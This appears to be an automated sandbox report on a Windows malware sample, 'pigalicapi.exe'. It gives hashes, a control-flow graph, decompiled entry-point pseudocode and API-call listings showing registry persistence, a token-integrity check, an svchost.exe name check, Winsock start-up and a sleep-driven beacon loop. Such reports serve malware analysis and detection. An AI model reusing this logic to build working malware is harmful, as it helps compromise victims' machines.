                                                                                                                                                                                                                                                                                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                                        • API String ID: 2739279601-947817771
                                                                                                                                                                                                                                                                                                        • Opcode ID: fa4bdd773fad27bab30e7ebd558ad0faa04f12266293aff7e0ce22c65ec14a87
                                                                                                                                                                                                                                                                                                        • Instruction ID: 60fb6e0a90012b76936182255bc4f1c880527a7777d3290743f36148c922bcaa
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa4bdd773fad27bab30e7ebd558ad0faa04f12266293aff7e0ce22c65ec14a87
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B715F71E40318ABFF25CB90CC89BEA777CAB48715F004599F60AAA1C1DBB59B84CF54
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 808 24e3b00-24e3b5c call 24e1000 call 24e3130 call 24e2ed0 GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize call 24e4510 817 24e400a-24e400c ExitProcess 808->817 818 24e3b62-24e3c8c call 24e7d20 call 24e5700 call 24e5a00 call 24e7d20 call 24e9400 call 24e99f0 call 24e6060 call 24e5e00 StrStrIA call 24e1120 call 24e5e30 call 24e6cf0 call 24e5f30 call 24e9b90 WSAStartup 808->818 818->817 845 24e3c92-24e3cb1 818->845 846 24e3cb3-24e3cbb 845->846 847 24e3cc0-24e3cc9 845->847 846->847 848 24e3cda-24e3ce3 847->848 849 24e3ccb-24e3cd4 847->849 850 24e3cf4-24e3cfd 848->850 851 24e3ce5-24e3cee 848->851 849->848 852 24e3cff-24e3d07 850->852 853 24e3d0c-24e3d15 850->853 851->850 852->853 854 24e3d26-24e3d2f 853->854 855 24e3d17-24e3d20 853->855 856 24e3d40-24e3dfd call 24e7d20 call 24ea700 call 24ea4b0 call 24e5b50 call 24e8a70 854->856 857 24e3d31-24e3d3a 854->857 855->854 868 24e3dff-24e3e3f call 24e7d20 call 24e78d0 856->868 869 24e3e49 856->869 857->856 868->869 871 24e3e53-24e3eab call 24e7970 call 24e4020 869->871 879 24e3f8a 871->879 880 24e3eb1-24e3ed9 call 24e4020 871->880 882 24e3f91-24e3f9a 879->882 888 24e3edf-24e3efa call 24e4020 880->888 889 24e3f81 880->889 883 24e3f9c-24e3fa3 882->883 884 24e3fed-24e3ffa Sleep 882->884 886 24e3fa5-24e3fac 883->886 887 24e3fd0-24e3fd7 883->887 884->871 890 24e3fae-24e3fc2 886->890 891 24e3fc4 886->891 887->884 892 24e3fd9-24e3fe3 887->892 895 24e3eff-24e3f07 888->895 893 24e3f88 889->893 896 24e3fce 890->896 891->896 892->884 893->882 897 24e3f78 895->897 898 24e3f09-24e3f50 call 24e42e0 call 24e4020 895->898 896->884 900 24e3f7f 897->900 904 24e3f59-24e3f60 898->904 905 24e3f52 898->905 900->893 906 24e3f76 904->906 907 24e3f62-24e3f70 VirtualFree 904->907 905->904 906->900 907->906
                                                                                                                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                                        			_entry_() {
                                                                                                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                                                                                                        				char _v1148;
                                                                                                                                                                                                                                                                                                        				signed char _v1149;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1156;
                                                                                                                                                                                                                                                                                                        				char _v1556;
                                                                                                                                                                                                                                                                                                        				char _v9556;
                                                                                                                                                                                                                                                                                                        				long _v9560;
                                                                                                                                                                                                                                                                                                        				char _v9564;
                                                                                                                                                                                                                                                                                                        				char _v12068;
                                                                                                                                                                                                                                                                                                        				signed int _v12072;
                                                                                                                                                                                                                                                                                                        				char _v12076;
                                                                                                                                                                                                                                                                                                        				long _v12080;
                                                                                                                                                                                                                                                                                                        				char _v12081;
                                                                                                                                                                                                                                                                                                        				long _v12088;
                                                                                                                                                                                                                                                                                                        				long _v12092;
                                                                                                                                                                                                                                                                                                        				long _v12096;
                                                                                                                                                                                                                                                                                                        				signed int _v12100;
                                                                                                                                                                                                                                                                                                        				signed char _v12101;
                                                                                                                                                                                                                                                                                                        				long _v12108;
                                                                                                                                                                                                                                                                                                        				signed int _v12112;
                                                                                                                                                                                                                                                                                                        				void* _v12116;
                                                                                                                                                                                                                                                                                                        				signed char _t69;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t74;
                                                                                                                                                                                                                                                                                                        				signed char _t77;
                                                                                                                                                                                                                                                                                                        				signed char _t79;
                                                                                                                                                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                                                                                                                                                        				signed char _t85;
                                                                                                                                                                                                                                                                                                        				signed char _t86;
                                                                                                                                                                                                                                                                                                        				signed char _t87;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t88;
                                                                                                                                                                                                                                                                                                        				char* _t89;
                                                                                                                                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                                                                                                                                        				void* _t98;
                                                                                                                                                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                                                                                                                                                        				signed char _t102;
                                                                                                                                                                                                                                                                                                        				signed char _t104;
                                                                                                                                                                                                                                                                                                        				signed char _t106;
                                                                                                                                                                                                                                                                                                        				signed char _t110;
                                                                                                                                                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                                                                                                                                                        				signed int _t118;
                                                                                                                                                                                                                                                                                                        				char _t125;
                                                                                                                                                                                                                                                                                                        				signed int _t138;
                                                                                                                                                                                                                                                                                                        				signed int _t140;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t143;
                                                                                                                                                                                                                                                                                                        				signed int _t159;
                                                                                                                                                                                                                                                                                                        				signed int _t161;
                                                                                                                                                                                                                                                                                                        				void* _t163;
                                                                                                                                                                                                                                                                                                        				void* _t165;
                                                                                                                                                                                                                                                                                                        				void* _t173;
                                                                                                                                                                                                                                                                                                        				void* _t177;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				E024E1000(0x2f50);
                                                                                                                                                                                                                                                                                                        				_v8 = E024E3130();
                                                                                                                                                                                                                                                                                                        				E024E2ED0(_v8);
                                                                                                                                                                                                                                                                                                        				GetModuleFileNameA(0, "C:\Users\alfons\pigalicapi.exe", 0x208);
                                                                                                                                                                                                                                                                                                        				SetUnhandledExceptionFilter(E024E5DB0); // executed
                                                                                                                                                                                                                                                                                                        				__imp__CoInitialize(0); // executed
                                                                                                                                                                                                                                                                                                        				_t69 = E024E4510(_v8, 0x24f3c88); // executed
                                                                                                                                                                                                                                                                                                        				_t165 = _t163 + 0xc;
                                                                                                                                                                                                                                                                                                        				if((_t69 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        					L39:
                                                                                                                                                                                                                                                                                                        					ExitProcess(0);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				E024E7D20( &_v1148,  &_v1148, 0, 0x46b);
                                                                                                                                                                                                                                                                                                        				E024E5700( &_v1148); // executed
                                                                                                                                                                                                                                                                                                        				_t143 =  *0x24f18a0; // 0x24f3b88
                                                                                                                                                                                                                                                                                                        				_t74 = E024E5A00( &_v1148, _t143, 0xff); // executed
                                                                                                                                                                                                                                                                                                        				_v1156 = _t74;
                                                                                                                                                                                                                                                                                                        				E024E7D20(_t74, "Hogerfazwafx", 0, 0x12c);
                                                                                                                                                                                                                                                                                                        				E024E9400( &_v1148, "Hogerfazwafx", 0xa); // executed
                                                                                                                                                                                                                                                                                                        				_t77 = E024E99F0(); // executed
                                                                                                                                                                                                                                                                                                        				 *0x24f435a = _t77;
                                                                                                                                                                                                                                                                                                        				 *0x24f435d = E024E6060(); // executed
                                                                                                                                                                                                                                                                                                        				_t79 = E024E5E00(); // executed
                                                                                                                                                                                                                                                                                                        				 *0x24f435e = _t79;
                                                                                                                                                                                                                                                                                                        				_t80 = StrStrIA("C:\Users\alfons\pigalicapi.exe", "svchost.exe"); // executed
                                                                                                                                                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                                        				 *0x24f4362 =  ~( ~_t80);
                                                                                                                                                                                                                                                                                                        				E024E1120("C:\Users\alfons\pigalicapi.exe", "pigalicapi",  *0x24f435a & 0x000000ff,  *0x24f4362 & 0x000000ff, 0x24f436c); // executed
                                                                                                                                                                                                                                                                                                        				_t85 = E024E5E30(0); // executed
                                                                                                                                                                                                                                                                                                        				 *0x24f435b = _t85;
                                                                                                                                                                                                                                                                                                        				 *0x24f435f = 1; // executed
                                                                                                                                                                                                                                                                                                        				_t86 = E024E6CF0(); // executed
                                                                                                                                                                                                                                                                                                        				_v1149 = _t86;
                                                                                                                                                                                                                                                                                                        				_t87 = E024E5F30(); // executed
                                                                                                                                                                                                                                                                                                        				 *0x24f435c = _t87 & 0x000000ff | _v1149 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        				_t88 = E024E9B90(0xffffffff);
                                                                                                                                                                                                                                                                                                        				_t173 = _t165 + 0x50;
                                                                                                                                                                                                                                                                                                        				 *0x24f4364 = _t88;
                                                                                                                                                                                                                                                                                                        				_t89 =  &_v1556;
                                                                                                                                                                                                                                                                                                        				_push(_t89);
                                                                                                                                                                                                                                                                                                        				_push(0x202); // executed
                                                                                                                                                                                                                                                                                                        				L024EB1E6(); // executed
                                                                                                                                                                                                                                                                                                        				if(_t89 != 0) {
                                                                                                                                                                                                                                                                                                        					goto L39;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_t125 =  *0x24f19a8; // 0x1d
                                                                                                                                                                                                                                                                                                        					_v12081 = _t125;
                                                                                                                                                                                                                                                                                                        					 *0x24f4378 = 0x10;
                                                                                                                                                                                                                                                                                                        					if(( *0x24f435f & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_t118 =  *0x24f4378; // 0x1b
                                                                                                                                                                                                                                                                                                        						 *0x24f4378 = _t118 | 0x00000008;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(( *0x24f435c & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_t161 =  *0x24f4378; // 0x1b
                                                                                                                                                                                                                                                                                                        						 *0x24f4378 = _t161 | 0x00000001;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(( *0x24f435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_t140 =  *0x24f4378; // 0x1b
                                                                                                                                                                                                                                                                                                        						 *0x24f4378 = _t140 | 0x00000004;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(( *0x24f435e & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_t116 =  *0x24f4378; // 0x1b
                                                                                                                                                                                                                                                                                                        						 *0x24f4378 = _t116 | 0x00000002;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(( *0x24f4360 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_t159 =  *0x24f4378; // 0x1b
                                                                                                                                                                                                                                                                                                        						 *0x24f4378 = _t159 | 0x00000020;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t91 =  *0x24f4361 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					if(( *0x24f4361 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_t138 =  *0x24f4378; // 0x1b
                                                                                                                                                                                                                                                                                                        						 *0x24f4378 = _t138 | 0x00000040;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v9564 = 0x9c3;
                                                                                                                                                                                                                                                                                                        					E024E7D20(_t91,  &_v12068, 0, 0x9c4);
                                                                                                                                                                                                                                                                                                        					E024EA700();
                                                                                                                                                                                                                                                                                                        					E024EA4B0( &_v12068,  &_v9564, 0x24f3cb6,  *0x24f3cb4 & 0x0000ffff);
                                                                                                                                                                                                                                                                                                        					_v9560 = 0;
                                                                                                                                                                                                                                                                                                        					_t97 = E024E5B50( &_v12068, ";",  &_v9560, 0); // executed
                                                                                                                                                                                                                                                                                                        					_v12072 = _t97;
                                                                                                                                                                                                                                                                                                        					_v12092 = 0;
                                                                                                                                                                                                                                                                                                        					_v12080 = 0;
                                                                                                                                                                                                                                                                                                        					_v12076 = 0x4b0;
                                                                                                                                                                                                                                                                                                        					_t98 = E024E8A70(0x24f2c34,  &_v12076, 0x24f2ba8, 0x8c, 0x24ee008, 0x254); // executed
                                                                                                                                                                                                                                                                                                        					_t177 = _t173 + 0x44;
                                                                                                                                                                                                                                                                                                        					if(_t98 != 0) {
                                                                                                                                                                                                                                                                                                        						E024E7D20( &_v9556,  &_v9556, 0, 0x1f40);
                                                                                                                                                                                                                                                                                                        						E024E78D0(0x24f2c34, 0xc8,  &_v9556, 0xc8);
                                                                                                                                                                                                                                                                                                        						_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                                                        						_v12092 =  &_v9556;
                                                                                                                                                                                                                                                                                                        						_v12080 = 0xc8;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v12088 = 0;
                                                                                                                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                                                                                                                        					_v12101 = 0;
                                                                                                                                                                                                                                                                                                        					_v12108 = 0x1d4c0;
                                                                                                                                                                                                                                                                                                        					_v12096 = 0;
                                                                                                                                                                                                                                                                                                        					_t100 = E024E7970( &_v12096); // executed
                                                                                                                                                                                                                                                                                                        					_v12100 = _t100;
                                                                                                                                                                                                                                                                                                        					_t102 = E024E4020(_v12096, _v12100,  &_v1148, 1, 2, 0);
                                                                                                                                                                                                                                                                                                        					_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                                                        					if((_t102 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_v12101 = 1;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						_t104 = E024E4020(_v12092, _v12080,  &_v1148, 1, 5, 0);
                                                                                                                                                                                                                                                                                                        						_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                                                        						if((_t104 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        							_v12101 = 1;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t106 = E024E4020(_v9560, _v12072,  &_v1148, 3, 0xa, 1); // executed
                                                                                                                                                                                                                                                                                                        							_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                                                        							if((_t106 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        								_v12101 = 1;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_v12116 = 0;
                                                                                                                                                                                                                                                                                                        								_v12112 = E024E42E0( &_v12116);
                                                                                                                                                                                                                                                                                                        								_t110 = E024E4020(_v12116, _v12112,  &_v1148, 1, 0x17, 0);
                                                                                                                                                                                                                                                                                                        								_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                                                        								if((_t110 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        									_v12101 = 1;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								if(_v12116 != 0) {
                                                                                                                                                                                                                                                                                                        									VirtualFree(_v12116, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if((_v12101 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						if( *0x24f18a4 != 1) {
                                                                                                                                                                                                                                                                                                        							if( *0x24f18a4 == 2) {
                                                                                                                                                                                                                                                                                                        								 *0x24f18a4 = 1;
                                                                                                                                                                                                                                                                                                        								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							if( *0x24f30e4 != 2) {
                                                                                                                                                                                                                                                                                                        								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_v12108 = 0x3e8;
                                                                                                                                                                                                                                                                                                        								 *0x24f18a4 = 2;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					Sleep(_v12108); // executed
                                                                                                                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}





















































                                                                                                                                                                                                                                                                                                        0x024e3b08
                                                                                                                                                                                                                                                                                                        0x024e3b12
                                                                                                                                                                                                                                                                                                        0x024e3b19
                                                                                                                                                                                                                                                                                                        0x024e3b2d
                                                                                                                                                                                                                                                                                                        0x024e3b38
                                                                                                                                                                                                                                                                                                        0x024e3b40
                                                                                                                                                                                                                                                                                                        0x024e3b4f
                                                                                                                                                                                                                                                                                                        0x024e3b54
                                                                                                                                                                                                                                                                                                        0x024e3b5c
                                                                                                                                                                                                                                                                                                        0x024e400a
                                                                                                                                                                                                                                                                                                        0x024e400c
                                                                                                                                                                                                                                                                                                        0x024e400c
                                                                                                                                                                                                                                                                                                        0x024e3b70
                                                                                                                                                                                                                                                                                                        0x024e3b7f
                                                                                                                                                                                                                                                                                                        0x024e3b8c
                                                                                                                                                                                                                                                                                                        0x024e3b9a
                                                                                                                                                                                                                                                                                                        0x024e3ba2
                                                                                                                                                                                                                                                                                                        0x024e3bb4
                                                                                                                                                                                                                                                                                                        0x024e3bca
                                                                                                                                                                                                                                                                                                        0x024e3bd2
                                                                                                                                                                                                                                                                                                        0x024e3bd7
                                                                                                                                                                                                                                                                                                        0x024e3be1
                                                                                                                                                                                                                                                                                                        0x024e3be6
                                                                                                                                                                                                                                                                                                        0x024e3beb
                                                                                                                                                                                                                                                                                                        0x024e3bfa
                                                                                                                                                                                                                                                                                                        0x024e3c02
                                                                                                                                                                                                                                                                                                        0x024e3c06
                                                                                                                                                                                                                                                                                                        0x024e3c2a
                                                                                                                                                                                                                                                                                                        0x024e3c34
                                                                                                                                                                                                                                                                                                        0x024e3c3c
                                                                                                                                                                                                                                                                                                        0x024e3c41
                                                                                                                                                                                                                                                                                                        0x024e3c48
                                                                                                                                                                                                                                                                                                        0x024e3c4d
                                                                                                                                                                                                                                                                                                        0x024e3c53
                                                                                                                                                                                                                                                                                                        0x024e3c64
                                                                                                                                                                                                                                                                                                        0x024e3c6c
                                                                                                                                                                                                                                                                                                        0x024e3c71
                                                                                                                                                                                                                                                                                                        0x024e3c74
                                                                                                                                                                                                                                                                                                        0x024e3c79
                                                                                                                                                                                                                                                                                                        0x024e3c7f
                                                                                                                                                                                                                                                                                                        0x024e3c80
                                                                                                                                                                                                                                                                                                        0x024e3c85
                                                                                                                                                                                                                                                                                                        0x024e3c8c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e3c92
                                                                                                                                                                                                                                                                                                        0x024e3c92
                                                                                                                                                                                                                                                                                                        0x024e3c98
                                                                                                                                                                                                                                                                                                        0x024e3c9e
                                                                                                                                                                                                                                                                                                        0x024e3cb1
                                                                                                                                                                                                                                                                                                        0x024e3cb3
                                                                                                                                                                                                                                                                                                        0x024e3cbb
                                                                                                                                                                                                                                                                                                        0x024e3cbb
                                                                                                                                                                                                                                                                                                        0x024e3cc9
                                                                                                                                                                                                                                                                                                        0x024e3ccb
                                                                                                                                                                                                                                                                                                        0x024e3cd4
                                                                                                                                                                                                                                                                                                        0x024e3cd4
                                                                                                                                                                                                                                                                                                        0x024e3ce3
                                                                                                                                                                                                                                                                                                        0x024e3ce5
                                                                                                                                                                                                                                                                                                        0x024e3cee
                                                                                                                                                                                                                                                                                                        0x024e3cee
                                                                                                                                                                                                                                                                                                        0x024e3cfd
                                                                                                                                                                                                                                                                                                        0x024e3cff
                                                                                                                                                                                                                                                                                                        0x024e3d07
                                                                                                                                                                                                                                                                                                        0x024e3d07
                                                                                                                                                                                                                                                                                                        0x024e3d15
                                                                                                                                                                                                                                                                                                        0x024e3d17
                                                                                                                                                                                                                                                                                                        0x024e3d20
                                                                                                                                                                                                                                                                                                        0x024e3d20
                                                                                                                                                                                                                                                                                                        0x024e3d26
                                                                                                                                                                                                                                                                                                        0x024e3d2f
                                                                                                                                                                                                                                                                                                        0x024e3d31
                                                                                                                                                                                                                                                                                                        0x024e3d3a
                                                                                                                                                                                                                                                                                                        0x024e3d3a
                                                                                                                                                                                                                                                                                                        0x024e3d40
                                                                                                                                                                                                                                                                                                        0x024e3d58
                                                                                                                                                                                                                                                                                                        0x024e3d60
                                                                                                                                                                                                                                                                                                        0x024e3d80
                                                                                                                                                                                                                                                                                                        0x024e3d88
                                                                                                                                                                                                                                                                                                        0x024e3da7
                                                                                                                                                                                                                                                                                                        0x024e3daf
                                                                                                                                                                                                                                                                                                        0x024e3db5
                                                                                                                                                                                                                                                                                                        0x024e3dbf
                                                                                                                                                                                                                                                                                                        0x024e3dc9
                                                                                                                                                                                                                                                                                                        0x024e3df3
                                                                                                                                                                                                                                                                                                        0x024e3df8
                                                                                                                                                                                                                                                                                                        0x024e3dfd
                                                                                                                                                                                                                                                                                                        0x024e3e0d
                                                                                                                                                                                                                                                                                                        0x024e3e2b
                                                                                                                                                                                                                                                                                                        0x024e3e30
                                                                                                                                                                                                                                                                                                        0x024e3e39
                                                                                                                                                                                                                                                                                                        0x024e3e3f
                                                                                                                                                                                                                                                                                                        0x024e3e3f
                                                                                                                                                                                                                                                                                                        0x024e3e49
                                                                                                                                                                                                                                                                                                        0x024e3e53
                                                                                                                                                                                                                                                                                                        0x024e3e53
                                                                                                                                                                                                                                                                                                        0x024e3e5a
                                                                                                                                                                                                                                                                                                        0x024e3e64
                                                                                                                                                                                                                                                                                                        0x024e3e75
                                                                                                                                                                                                                                                                                                        0x024e3e7d
                                                                                                                                                                                                                                                                                                        0x024e3e9e
                                                                                                                                                                                                                                                                                                        0x024e3ea3
                                                                                                                                                                                                                                                                                                        0x024e3eab
                                                                                                                                                                                                                                                                                                        0x024e3f8a
                                                                                                                                                                                                                                                                                                        0x024e3eb1
                                                                                                                                                                                                                                                                                                        0x024e3ecc
                                                                                                                                                                                                                                                                                                        0x024e3ed1
                                                                                                                                                                                                                                                                                                        0x024e3ed9
                                                                                                                                                                                                                                                                                                        0x024e3f81
                                                                                                                                                                                                                                                                                                        0x024e3edf
                                                                                                                                                                                                                                                                                                        0x024e3efa
                                                                                                                                                                                                                                                                                                        0x024e3eff
                                                                                                                                                                                                                                                                                                        0x024e3f07
                                                                                                                                                                                                                                                                                                        0x024e3f78
                                                                                                                                                                                                                                                                                                        0x024e3f09
                                                                                                                                                                                                                                                                                                        0x024e3f09
                                                                                                                                                                                                                                                                                                        0x024e3f22
                                                                                                                                                                                                                                                                                                        0x024e3f43
                                                                                                                                                                                                                                                                                                        0x024e3f48
                                                                                                                                                                                                                                                                                                        0x024e3f50
                                                                                                                                                                                                                                                                                                        0x024e3f52
                                                                                                                                                                                                                                                                                                        0x024e3f52
                                                                                                                                                                                                                                                                                                        0x024e3f60
                                                                                                                                                                                                                                                                                                        0x024e3f70
                                                                                                                                                                                                                                                                                                        0x024e3f70
                                                                                                                                                                                                                                                                                                        0x024e3f76
                                                                                                                                                                                                                                                                                                        0x024e3f7f
                                                                                                                                                                                                                                                                                                        0x024e3f88
                                                                                                                                                                                                                                                                                                        0x024e3f9a
                                                                                                                                                                                                                                                                                                        0x024e3fa3
                                                                                                                                                                                                                                                                                                        0x024e3fd7
                                                                                                                                                                                                                                                                                                        0x024e3fd9
                                                                                                                                                                                                                                                                                                        0x024e3fe3
                                                                                                                                                                                                                                                                                                        0x024e3fe3
                                                                                                                                                                                                                                                                                                        0x024e3fa5
                                                                                                                                                                                                                                                                                                        0x024e3fac
                                                                                                                                                                                                                                                                                                        0x024e3fc4
                                                                                                                                                                                                                                                                                                        0x024e3fae
                                                                                                                                                                                                                                                                                                        0x024e3fae
                                                                                                                                                                                                                                                                                                        0x024e3fb8
                                                                                                                                                                                                                                                                                                        0x024e3fb8
                                                                                                                                                                                                                                                                                                        0x024e3fce
                                                                                                                                                                                                                                                                                                        0x024e3fa3
                                                                                                                                                                                                                                                                                                        0x024e3ff4
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e3ff4

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000208), ref: 024E3B2D
                                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(024E5DB0), ref: 024E3B38
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 024E3B40
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E4510: GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 024E456C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E4510: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024E458B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E4510: GetFileSize.KERNEL32(000000FF,00000000), ref: 024E45AD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E4510: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E45D6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E4510: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 024E4617
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E4510: FindCloseChangeNotification.KERNEL32(000000FF), ref: 024E463E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E4510: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E47C0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E4510: CloseHandle.KERNEL32(00000000), ref: 024E47E0
                                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 024E400C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5700: GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 024E5742
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5700: lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 024E57B8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5700: GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 024E57F1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5700: wnsprintfA.SHLWAPI ref: 024E582F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5700: CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024E5854
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5700: GetFileSize.KERNEL32(000000FF,00000000), ref: 024E586D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5A00: lstrcpyA.KERNEL32(Mzsrkvcweomac,WDefault), ref: 024E5A47
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5A00: lstrlenA.KERNEL32(024EC4E0), ref: 024E5A7D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5A00: lstrcpyA.KERNEL32(00000000,024EC4E0), ref: 024E5A97
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5A00: lstrlenA.KERNEL32(00000000), ref: 024E5AA1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5A00: lstrlenA.KERNEL32(Mzsrkvcweomac), ref: 024E5AAE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5A00: lstrcatA.KERNEL32(00000000,Mzsrkvcweomac), ref: 024E5AC8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5A00: RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 024E5B00
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5A00: RegCloseKey.KERNEL32(00000000), ref: 024E5B0E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5A00: lstrlenA.KERNEL32(00000000), ref: 024E5B3B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E9400: lstrcpyA.KERNEL32(?,00000000), ref: 024E9513
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E9400: CharUpperA.USER32(?), ref: 024E9521
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E99F0: GetCurrentProcess.KERNEL32(00000008,?), ref: 024E9A0A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E99F0: OpenProcessToken.ADVAPI32(00000000), ref: 024E9A11
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E99F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 024E9A3A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E99F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 024E9A77
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E99F0: CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 024E9AAD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E99F0: EqualSid.ADVAPI32(?,00000000), ref: 024E9AC3
